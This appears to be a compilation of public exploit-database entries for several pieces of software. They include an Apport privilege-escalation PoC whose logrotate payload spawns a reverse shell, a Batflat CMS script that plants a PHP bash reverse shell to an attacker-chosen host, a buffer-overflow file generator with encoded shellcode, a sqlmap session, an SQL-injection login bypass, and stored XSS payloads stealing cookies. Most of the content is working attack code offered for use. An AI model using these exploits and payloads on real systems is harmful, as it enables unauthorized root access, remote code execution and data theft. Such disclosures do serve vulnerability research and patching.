# Exploit Title: Apport 2.20 - Local Privilege Escalation # Date: 18/02/21 # Exploit Author: Gr33nh4t # Vendor Homepage: https://ubuntu.com/ # Version: Apport: Ubuntu 20.10 - Before 2.20.11-0ubuntu50.5 Apport: Ubuntu 20.04 - Before 2.20.11-0ubuntu27.16 Apport: Ubuntu 18.04 - Before 2.20.9-0ubuntu7.23 Apport: Ubuntu 16.04 - Before 2.20.1-0ubuntu2.30 # Tested on: Ubuntu This is a POC for Apport exploit, we exploited these bugs by launching a reverse shell to 127.0.0.1:1234. # Setup To compile the exploit code several packages are needed: sudo apt-get install build-essential nasm gcc # Compilation make # Run ./exploit.sh The reverse shell will connect on the next execution of logrotate nc -l -p 1234 ## Makefile ## .PHONY: all clean CC=gcc CFLAGS= NASM=nasm NASM_FLAGS=-f elf64 LD=ld all: exploit crash decoy exploit: exploit.c $(CC) -o $@ $< $(CFLAGS) chmod +x $@ crash: crash.o $(LD) $^ -o $@ decoy: decoy.o $(LD) $^ -o $@ crash.o: crash.asm $(NASM) $(NASM_FLAGS) $^ decoy.o: decoy.asm $(NASM) $(NASM_FLAGS) $^ clean: rm exploit decoy crash *.o ## crash.asm ## section .data message db 10,"/var/crash/test.log{",10," su root root",10," daily",10," size=0",10," firstaction",10," python3 -c ", 34, "import sys,socket,os,pty; s=socket.socket();s.connect(('127.0.0.1', 1234));[os.dup2(s.fileno(), fd) for fd in (0,1,2)];pty.spawn('/bin/sh')", 34, ";",10," endscript",10,"}",10, 00 timeval: tv_sec dd 0 tv_usec dd 0 section .text global _start _start: mov dword [tv_sec], 4000000 mov dword [tv_usec], 0 mov rax, 35 mov rdi, timeval mov rsi, 0 syscall ## decoy.asm ## section .text global _start _start: mov dword [0], 0 ## exploit.c ## #include <unistd.h> #include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <signal.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #define PID_THRESHOLD (80) int read_max_pid_file() { FILE *fd = 0; char buf[256]; fd = fopen("/proc/sys/kernel/pid_max", "r"); fread(buf, sizeof(buf), 1, fd); fclose(fd); return atoi(buf); } void write_to_fifo_file(char * path) { FILE *fd = 0; char buf[] = "A"; fd = fopen(path, "w"); fwrite(buf, sizeof(buf), 1, fd); fclose(fd); return; } int main(int argc, char *argv[]) { int iteration = 0; pid_t crash_pid = -1, temp_pid = -1, spray_pid = -1; int current_pid = 0, max_pid = 0; int total_pid = 0; char *crash_argv[] = {"crash", NULL}; char *sudo_argv[] = {"sudo", "-S", "sud", NULL}; char current_dir[1024] = {0}; char exec_buf[2048] = {0}; char crash_buf[2048] = {0}; struct stat sb = {0} ; int null_fd = -1; signal(SIGCHLD, SIG_IGN); getcwd(current_dir, sizeof(current_dir)); snprintf(exec_buf, sizeof(exec_buf), "%s/%s", current_dir, "a\rUid: 0\rGid: 0"); snprintf(crash_buf, sizeof(crash_buf), "%s/%s", current_dir, "crash"); chdir("/etc/logrotate.d/"); // Creating the crash program if (0 == stat(crash_buf, &sb) && sb.st_mode & S_IXUSR) { crash_pid = fork(); if (0 == crash_pid) { execve(crash_buf, crash_argv, NULL); exit(0); } else if(-1 == crash_pid) { printf("[-] Could not fork program\n"); return -1; } } else { printf("[-] Please check crash file executable."); return -1; } max_pid = read_max_pid_file(); printf("[*] crash pid: %d\n", crash_pid); printf("[*] max pid: %d\n", max_pid); printf("[*] Creating ~%d PIDs\n", max_pid); printf("[*] Forking new processes\n"); sleep(3); // Iterating through max_pid to almost reach the crash program pid while (iteration < max_pid - 1) { // Print progress of forks if( 0 == (iteration % (int)(max_pid / 5000))) { printf("\rIteration: %d/%d", iteration + 1, max_pid); fflush(stdout); } temp_pid = -1; temp_pid = fork(); if (0 == temp_pid) { exit(0); } else if (temp_pid > 0) { iteration++; // We should stop before the crash pid to avoid other processes created meanwhile to interfere the exploit process if ( temp_pid < crash_pid && crash_pid - temp_pid < PID_THRESHOLD) { printf("\rIteration: %d/%d\n", iteration + 1, max_pid); fflush(stdout); printf("[+] less then %d pid from the target: last fork=%d , target: %d\n", PID_THRESHOLD, temp_pid, crash_pid); break; } } else if (-1 == temp_pid) { printf("[-] Could not fork temp programs\n"); } } printf("[*] Crashing the crash program\n"); kill(crash_pid, SIGSEGV); // From Now on the seconds apport will launch and we have 30 seconds to exploit it sleep(5); printf("[*] Killing the crash program\n"); kill(crash_pid, SIGKILL); sleep(3); // Now crash pid is free and we need to occupy it for(int i=0; i < PID_THRESHOLD ; i++) { spray_pid = fork(); if (0 == spray_pid) { if (crash_pid == getpid()) { null_fd = open("/dev/null", O_WRONLY); dup2(null_fd, 1); dup2(null_fd, 2); close(null_fd); printf("[+] Creating suid process\n"); execve(exec_buf, sudo_argv, NULL); } exit(0); } } sleep(3); printf("[*] Writing to fifo file\n"); write_to_fifo_file(argv[1]); // Now the first apport released and the second apport resumed printf("[+] Wrote core file to cwd!\n"); sleep(10); // Waiting for the second apport to finish execution return 0; } ## exploit.sh ## #!/bin/sh set -e echo "[*] Running exploit" touch /var/crash/test.log ulimit -c unlimited if [ ! -d "~/.config/apport" ]; then echo "[*] Settings directory not exists" echo "[*] Creating settings directory" mkdir -p ~/.config/apport fi if [ ! -f "~/.config/apport/settings" ] ; then echo "[*] Settings file not exists" echo "[main]\nunpackaged=true\n" > ~/.config/apport/settings echo "[+] Settings file created" fi DECOY_PATH=`realpath ./decoy` MY_UID=`id -u` DECOY_CRASH_NAME=`echo "${DECOY_PATH}.${MY_UID}.crash" | sed 's/\//_/g'` DECOY_CRASH_PATH="/var/crash/${DECOY_CRASH_NAME}" if [ -f $DECOY_CRASH_PATH ] || [ -p $DECOY_CRASH_PATH ] ; then echo "[*] decoy crash exists deleting the file" rm $DECOY_CRASH_PATH fi mkfifo $DECOY_CRASH_PATH echo "[+] FIFO file created" ./decoy 2>&1 >/dev/null & killall -SIGSEGV ./decoy echo "[+] Decoy process created" SUDO_PATH=`which sudo` ln -s $SUDO_PATH "linkchange" python3 -c "import os; os.rename('./linkchange', 'a\rUid: 0\rGid: 0')" echo "[+] symlink to sudo created" ./exploit $DECOY_CRASH_PATH rm $DECOY_CRASH_PATH sleep 5 if [ -f "/etc/logrotate.d/core" ] ; then echo "[*] Exploit succesfully finished" else echo "[*] Exploit failed" fi # Kill the sudo process after second apport finished kill `ps -ef | grep "sudo -S sud" | grep -v grep | awk '{print $2}'` ##

# Exploit Title: Batflat CMS 1.3.6 - Remote Code Execution (Authenticated) # Date: 2020-12-27 # Exploit Author: mari0x00 # Vendor Homepage: https://batflat.org/ # Software Link: https://github.com/sruupl/batflat/archive/master.zip # Description: https://secator.pl/index.php/2021/02/15/batflat-v-1-3-6-authenticated-remote-code-execution-public-disclosure/ # Version: <= 1.3.6 # CVE: CVE-2020-35734 #!/usr/bin/python3 import requests import sys import re from bs4 import BeautifulSoup from termcolor import colored from time import sleep print(colored('''###########################################################''',"red")) print(colored('''####### Batflat authenticated RCE by mari0x00 #######''',"red")) print(colored('''###########################################################''',"red")) print("") if len(sys.argv) != 6: print((colored("[~] Usage : python3 batpwnd.py <url> <username> <password> <IP> <PORT>","red"))) print((colored("[~] Default credentials: admin/admin","red"))) print((colored("[~] Example: python3 batpwnd.py http://192.168.101.105/ admin admin 192.168.101.101 4444","red"))) exit() url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] IP = sys.argv[4] PORT = sys.argv[5] #Start session s = requests.Session() headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0'} #Authenticate print((colored("[+] Attempting user login","blue"))) login_data = { "username": username, "password": password, "login": "", } login = s.post(url+"admin/", login_data, headers=headers) sleep(0.5) #Get token print((colored("[+] Retrieving the token","blue"))) r = s.get(url+"admin/", headers=headers).content soup = BeautifulSoup(r, "lxml") token = (re.search(r't=(.*?)">Add', str(soup)).group(1)) print((colored("[+] Token ID: " + token,"blue"))) sleep(0.5) #Get URL print((colored("[+] Getting the add-user endpoint URL","blue"))) r = s.get(url+"admin/users/add?t="+token, headers=headers).content soup = BeautifulSoup(r, "lxml") add_user_url = (re.search(r'action="(.*?)"', str(soup)).group(1)) sleep(0.5) #Exploit print((colored("[+] Adding pwnd user","blue"))) payload = "<?php system(\"/bin/bash -c 'bash -i >& /dev/tcp/" + IP + "/" + PORT + " 0>&1'\");?>" add_user = { "username": (None, "pwnd"), "fullname": (None, payload), "description": (None, "pwnd"), "email": (None, "[email protected]"), "password": (None, "pwnd123"), "access[]": (None, "users"), "save": (None, "Save") } exploit = s.post(add_user_url, headers=headers, files=add_user) sleep(0.5) #Triggering reverse shell print("") print((colored("[+] Triggering the shell. Go nuts!","green"))) r = s.get(url+"admin/users/manage?t="+token, headers=headers)

# Exploit Title: Comment System 1.0 - 'multiple' Stored Cross-Site Scripting # Date: 2021-02-18 # Exploit Author: Pintu Solanki # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/14713/comment-system-phpmysqli-full-source-code.html # Software: : Comment System 1.0 # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 # Vulnerable Page: http://localhost/comment/index.php # Vulnerable Input Field : Your Name: "><script>alert(document.cookie)</script> Comment: "><script>alert(document.cookie)</script> # Payload used: "><script>alert(document.cookie)</script> # POC: Whenever we will go to the page (http://localhost/comment/index.php) where the script is injected, the stored script will be executed. # You will see your Javascript code (XSS) executed.

# Exploit Title: PEEL Shopping 9.3.0 - 'Comments/Special Instructions' Stored Cross-Site Scripting # Date: 2021-02-16 # Exploit Author: Anmol K Sachan # Vendor Homepage: https://www.peel.fr/ # Software Link: https://sourceforge.net/projects/peel-shopping/ # Software: PEEL SHOPPING 9.3.0 # Vulnerability Type: Stored Cross-site Scripting # Vulnerability: Stored XSS # Tested on Windows 10 XAMPP # This application is vulnerable to Stored XSS vulnerability. # Vulnerable script: http://localhost/peel-shopping_9_3_0/achat/achat_maintenant.php # Vulnerable parameters: 'Comments / Special Instructions :' # Payload used: jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e # POC: in the same page where we injected payload refresh the page. # You will see your Javascript code (XSS) executed.

# Exploit Title: Online Exam System With Timer 1.0 - 'email' SQL injection Auth Bypass # Date: 2021-02-18 # Exploit Author: Suresh Kumar # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/13877/online-exam-timer.html # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 # This application is vulnerable to SQL injection vulnerability. # Vulnerable Page: http://localhost/CEE/adminpanel/admin/index.php # Payload used: Email => ' or 'x'='x Password => ' or 'x'='x # POC: Whenever we will go to the page (http://localhost/CEE/adminpanel/admin/index.php) when we inject SQL Payload then we will directly enter into the Admin Panel page.

# Exploit Title: dataSIMS Avionics ARINC 664-1 - Local Buffer Overflow (PoC) # Exploit Author: Kağan Çapar # Date: 2020-02-17 # Vendor Homepage: https://www.ddc-web.com/ # Software Link: https://www.ddc-web.com/en/connectivity/databus/milstd1553-1/software-1/bu-69414?partNumber=BU-69414 # Version: 4.5.3 # Tested On: Windows 10 Enterprise (x64) # about Sofware: # dataSIMS, an all-in-one Avionics Bus Analysis & Simulation Software Tool, provides an easy-to-use graphical interface, simplifying any MIL-STD-1553 or ARINC 429 testing effort. # about ARINC 664-1: # ARINC 664 is a multipart specification that defines an Ethernet data network for aircraft installations. # Part 7 of ARINC 664 defines a deterministic network, also known as Avionics Full Duplex Switched Ethernet (or AFDX®). #!/usr/bin/env python # -*- coding: UTF-8 -*- import struct import binascii import os import sys #EAX : 00000000 #EBX : 00000000 #ECX : 42424242 #EDX : 77B96330 ntdll.77B96330 #EBP : 000A1328 #ESP : 000A1308 #ESI : 00000000 #EDI : 00000000 #EIP : 42424242 #EFLAGS : 00010246 #LastError : 00000000 (ERROR_SUCCESS) #LastStatus : C0000034 (STATUS_OBJECT_NAME_NOT_FOUND) #Last chance expection on 42424242 (C0000005, EXPECTION_ACCESS_VIOLATION)! file = open("milstd1553result.txt", "w") junk = "\x41" * 600 align = "\x32" * 4 + "\x31" * 4 prop = "\x43" * 380 imp = "\x62\x7a\x68\x72\x74\x75\x72\x6c\x75\x32" imp2 = "\x61\x72\x61\x63\x61\x67\x131\x7a" #EIP Overwrite junk value overwrite = "\x42" * 4 #Payload size: 29 bytes #Final size of py file: 160 bytes #msfvenom -p generic/tight_loop --platform windows_86 -f py -e x86/shikata_ga_nai buf = b"" buf += b"\xda\xc1\xd9\x74\x24\xf4\x58\xbb\x0b\x7e\x97\x62\x33" buf += b"\xc9\xb1\x01\x31\x58\x19\x83\xe8\xfc\x03\x58\x15\xe9" buf += b"\x8b\x7c\x9c" win32 = junk + align + prop + imp + imp2 + overwrite + buf print len(win32) file.write(win32) file.close()

# Exploit Title: Beauty Parlour Management System 1.0 - 'sername' SQL Injection # Date: 19/2/2021 # Exploit Author: Thinkland Security Team # Vendor Homepage: https://phpgurukul.com/beauty-parlour-management-system-using-php-and-mysql/ # Software Link: https://phpgurukul.com/wp-content/uploads/2019/08/Beauty-Parlour-Management-System.zip # Version: V 1.0 # Tested on: Windows、XAMPP # Identify the vulnerability 1. go to http://localhost/bpms/admin/ and login with your account 2. then go to http://localhost/bpms/admin/edit-services.php?editid=17 3. Save the packet data as 3.txt POST /bpms/admin/edit-services.php?editid=17 HTTP/1.1 Host: http://localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 71 Origin: http://localhost Connection: close Referer: http://localhost/bpms/admin/edit-services.php?editid=17 Cookie: PHPSESSID=qaqv7jl8dqci4i2nldnj4n60s0 Upgrade-Insecure-Requests: 1 sername=%3Cimg+src%3D1+onerror%3Dalert%28%2Fxss%2F%29%3E&cost=1&submit= # Exploit Now you can exploit it using sqlmap command: sqlmap -r file --batch --dbms=mysql --current-db example: sqlmap.py -r 3.txt --batch --dbms=mysql --current-db &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; __H__ &nbsp;___ ___[.]_____ ___ ___&nbsp; {1.4.10.16#dev} |_ -| . [.]&nbsp;&nbsp;&nbsp;&nbsp; | .'| . | |___|_&nbsp; [)]_|_|_|__,|&nbsp; _| &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; |_|V...&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; |_|&nbsp;&nbsp; http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 09:30:14 /2021-02-19/ [09:30:14] [INFO] parsing HTTP request from '3.txt' it appears that provided value for POST parameter 'sername' has boundaries. Do you want to inject inside? ('<img src%3D1 onerror%3Dalert(/xss*/)>') [y/N] N [09:30:14] [WARNING] provided value for parameter 'submit' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly [09:30:14] [INFO] testing connection to the target URL [09:30:15] [INFO] testing if the target URL content is stable [09:30:15] [INFO] target URL content is stable [09:30:15] [INFO] testing if POST parameter 'sername' is dynamic [09:30:15] [WARNING] POST parameter 'sername' does not appear to be dynamic [09:30:15] [WARNING] heuristic (basic) test shows that POST parameter 'sername' might not be injectable [09:30:15] [INFO] testing for SQL injection on POST parameter 'sername' [09:30:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [09:30:15] [WARNING] reflective value(s) found and filtering out [09:30:16] [INFO] testing 'Boolean-based blind - Parameter replace (original value)' [09:30:16] [INFO] testing 'Generic inline queries' [09:30:16] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' [09:30:16] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)' [09:30:16] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' [09:30:16] [WARNING] time-based comparison requires larger statistical model, please wait........ (done) [09:30:26] [INFO] POST parameter 'sername' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y [09:30:26] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' [09:30:26] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found [09:30:27] [INFO] checking if the injection point on POST parameter 'sername' is a false positive POST parameter 'sername' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N sqlmap identified the following injection point(s) with a total of 62 HTTP(s) requests: --- Parameter: sername (POST) &nbsp;&nbsp;&nbsp; Type: time-based blind &nbsp;&nbsp;&nbsp; Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) &nbsp;&nbsp;&nbsp; Payload: sername=<img src=1 onerror=alert(/xss/)>' AND (SELECT 3311 FROM (SELECT(SLEEP(5)))YaHW) AND 'HGFO'='HGFO&cost=1&submit= --- [09:30:42] [INFO] the back-end DBMS is MySQL [09:30:42] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) [09:30:47] [INFO] fetching current database [09:30:47] [INFO] retrieved: [09:30:57] [INFO] adjusting time delay to 1 second due to good response times bpmsdb current database: 'bpmsdb' [09:31:15] [INFO] fetched data logged to text files under

# Exploit Title: OpenText Content Server 20.3 - 'multiple' Stored Cross-Site Scripting # Date: 19/02/2021 # Exploit Author: Kamil Breński # Vendor Homepage: https://www.opentext.com/ # Software Link: https://www.opentext.com/products-and-solutions/products/enterprise-content-management/content-management # Version: 20.3 ========================================================================================== 1.) Document version XSS ========================================================================================== A user with permissions to create new document versions could create a malicious stored cross-site scripting payload. The description value would be reflected by the server without proper sanitization resulting in a stored XSS vulnerability. ------------------------------------------------------------------------------------------ POST /otcs/cs.exe HTTP/1.1 Host: redacted User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=--------------------------20043647051137266192675354452 Content-Length: 2071 Origin: https://redacted Connection: close [snipped] -----------------------------20043647051137266192675354452 Content-Disposition: form-data; name="func" doc.addversion2 -----------------------------20043647051137266192675354452 Content-Disposition: form-data; name="nodeID" 1125007 [snipped] -----------------------------20043647051137266192675354452 Content-Disposition: form-data; name="comment" <svg/onload=alert()> -----------------------------20043647051137266192675354452 [snipped] ------------------------------------------------------------------------------------------ Next a user which visits the version site will execute the malicious javascript. An example URL will look like the following: ------------------------------------------------------------------------------------------ https://redacted/otcs/cs.exe?func=ll&objId=1125007&objAction=versions&nexturl=%2Fotcs%2Fcs%2Eexe%3Ffunc%3Dll%26objid%3D1121694%26objAction%3Dbrowse%26sort%3Dname ------------------------------------------------------------------------------------------ ========================================================================================== 2.) Project Banner XSS ========================================================================================== A project banner could be crafter in such a way that clicking it would result in the execution of user defined javascript. The application did not validate the scheme used by the user supplied URL and it could be set to "javascript://". The request which saved the payload on the server look like the following: ------------------------------------------------------------------------------------------ POST /otcs/cs.exe HTTP/1.1 Host: redacted User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 479 Origin: redacted Connection: close[snipped] func=ll&objAction=ConfigLookFeel&objId=1120281&currenttab=2&tab=1&roleid=0&newroleid=0&IMG1_ID=1129727&IMG1_PathSaved=STM.K.Brenski%40redacted+Home%3Aimgx.svg&IMG1_Path=STM.K.Brenski%40redacted+Home%3Aimgx.svg&IMG1_ALT=THISBANNERWILLEXECUTEJAVASCRIPT&IMG1_URL=JaVaScRiPt%3Aalert%28%27XSS%27%29&IMG2_ID=1129727&IMG2_PathSaved=STM.K.Brenski%40redacted+Home%3Aimgx.svg&IMG2_Path=STM.K.Brenski%40redacted+Home%3Aimgx.svg&IMG2_ALT=THISONETOO&IMG2_URL=JaVaScRiPt%3Aalert%28%27XSS%27%29 ------------------------------------------------------------------------------------------ Next a user would have to browse to the project page and click on the project banner. ==========================================================================================

# Exploit Title: Monica 2.19.1 - 'last_name' Stored XSS # Date: 22-02-2021 # Exploit Author: BouSalman # Vendor Homepage: https://www.monicahq.com/ # Software Link: https://github.com/monicahq/monica/releases # Version: Monica 2.19.1 # Tested on: Ubuntu 18.04 # CVE : CVE-2021-27370 POST /people HTTP/1.1 Host: 192.168.99.162 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 199 Origin: http://192.168.99.162 Connection: close Referer: http://192.168.99.162/people/add Cookie: remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6IjZBQ21CelczS1ZxS1dmMkNxWFBqN1E9PSIsInZhbHVlIjoiME01aDNSS2FHQ1lZdS9KSVlSL1pKdC9qcHRWRDVveWFvb0ZkUFB4cFlaSDhEclB3SG9UQ3BISzVoWFdYQUYrVkdpUVNkRUNlbUxFOTEyOC9Vb1ZaWFZTblpGOWlRVW9PR0FmSVhyL3JwUmgweU9hODlJWU5vNmQ3aDcrT084MjBoQU5Ednh0TWJ6dmxwS2NadFovMEdveko1V0RvbThXT2Jram1JVW5LcXdqUzl4alVBRDFBYXNjSEt3amRxbVFvQ3pMMGJZU2owWTZzWVp1ZURTNUtoRUlJMnVrV3NiVHRNRTU5YysvLzl2Zz0iLCJtYWMiOiI5MTc2NDAwZTY4NjVmZDg3NjM1YjY3NDRiMzFhMmRiYzIwMjFhODU4YWQyOWUwZmQzOTBlY2Y1ZTI0ODdiNzVkIn0%3D; laravel_token=eyJpdiI6InIwQ2RlQW9FRG5lanlOZmlXWXBRVEE9PSIsInZhbHVlIjoiUHhPNmZneXUydGVCZHlVMEI5cHpiTWI2OE5qajN5UVJXUmJHSFV1VGgya2NEbEJ6T3N0QVhKeUZwU0R4a05HWTgwNTNidTk4aGNXc3UzejY4WDJnaUJ0VUp1ekQ5cjVDc0hLSWpGTzc1ZWRRQ05Yem0vK3RZdEpOVHNQeE4rQ1orbXNJTXhWczJnMENYeGp6Q3NnOGU5TXhpZDd1bS9wRlBZS0xsYmpLSXJiMHhSVmU2NnBUMjdYS1RTQmJrNkU4cWNtZGJVdjFpaXp5a2YzdVZsWWxQMjBicDQxUGFjZlhGbmhCOHl2MkVXdzRoalNtbE9xL010clpZMGJNVmVQNWUzQlpsRFVKamlWQ2Jydk9sZWg3cHNKWVIvRW92alp0YURJcllXa08rTjA4Y2lvVzNHTXBrem11Q21xaW92cEwiLCJtYWMiOiI1YjM5NzViODhjNTk5MWUzNWFjZDg0ZWZmNjk1NjE3MzhhN2M0NGFjNWE3MzMyMGFhNTI2ZjgxMjE4OTRjZDg4In0%3D; XSRF-TOKEN=eyJpdiI6IkZFY1FLVEJFRXJMOWh6Vll1SW51akE9PSIsInZhbHVlIjoiRTVLRFZnOEovNk9XeFB2bXFQZnFlM0FxRU9QMVRxaHRhS3RzOHNpWm45K0xXV1FsbWhzV0RxUWd6bStxVXFBTHF1WlkrSklnSXoxbkFXK1JNcURhUHp6eTFOUHdLclFkTTEvUFhtTDgzVHA2RElFNnVuOWVyRGxCSGJmdzhJOXciLCJtYWMiOiIxOWNlMjkxMjM5ZTlmMDFiZjhiM2VlZjZjZmNmMmFmZDA4MzcyZjc3Yzg2MmQ2MWIwNTY2OTZlNjQyZDkzMjA0In0%3D; laravel_session=eyJpdiI6InBtUThtUFE1RzdvbW40ay8wdWJraXc9PSIsInZhbHVlIjoiS1hoVlJoNzFrYlpBUGRTL2V0YzVDRlR6dHl6NE12NjFxVTEvbXQwYTJnRUwyY3VQc2hOeWlkbUdyeEx5aDBnYlJER1BnbW52RXR0QWs1ZG00eWg0U2JNb3dIRTQ0aU9HK0JnTzE5eXQwUGlzbDNsbVFVa3RabWVQVzF4OXJsUTMiLCJtYWMiOiI3YmQwZDFkYjAwMzdlZTllODAzYjZmNzQ2YWI5NTMzMDY0ZWIzMWIyOWI4MjM4ODMzMDdhNjc2YTE4ZDViZDg0In0%3D Upgrade-Insecure-Requests: 1 _token=afJRD6VqgCxIze3tGcCqzyeb3YaFka3fvjqV9YOx&first_name=XSS+POC&middle_name=&last_name=%7B%7B+constructor.constructor%28%22alert%28document.cookie%29%22%29%28%29+%7D%7D&nickname=&gender=&save=true